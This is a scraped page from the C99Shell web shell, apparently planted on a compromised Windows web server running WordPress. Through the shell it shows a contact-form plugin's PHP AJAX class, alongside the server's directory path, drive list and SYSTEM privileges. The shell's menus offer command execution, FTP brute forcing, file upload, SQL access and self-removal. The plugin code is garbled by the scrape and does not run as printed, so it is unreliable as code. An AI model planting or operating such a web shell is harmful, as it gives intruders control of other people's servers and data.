!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wcp-contact-form\agp-core\classes\ajax\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Agp_AjaxAbstract.class.php (1.28 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Webcodin\WCPContactForm\Core;

abstract class 
Agp_AjaxAbstract {
    
    
/**
     * Constructor
     */
    
public function __construct() {
        foreach (
get_class_methods($this) as $action) {
            if ( !
in_array($action, array('__construct''request''response' )) ) {
                
add_action"wp_ajax_$action, array($this'request') );
                
add_action"wp_ajax_nopriv_$action", array($this'request'));
            }
        }        
    }
    
    
/**
     * Request
     */
    
public function request() {
        if (
check_ajax_referer('ajax_atf_nonce''nonce'false)) {
            
$data $_POST;
            
$action $data['action'];
            if ( 
method_exists($this$action) ) {
                
error_reporting(0);
                
$this->response($this->$action($data));
            }
        } else {
            
http_response_code(500);
            die();
        }
    }
    
    
/**
     * Response
     * 
     * @param array|object|string $data
     */
    
public function response ($data) {
        if (
is_array($data)) {
            echo 
json_encode($data);
        } elseif (
is_object($data)) {
            echo 
json_encode(get_object_vars($data));    
        } else {
            echo 
$data;    
        }
        die();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--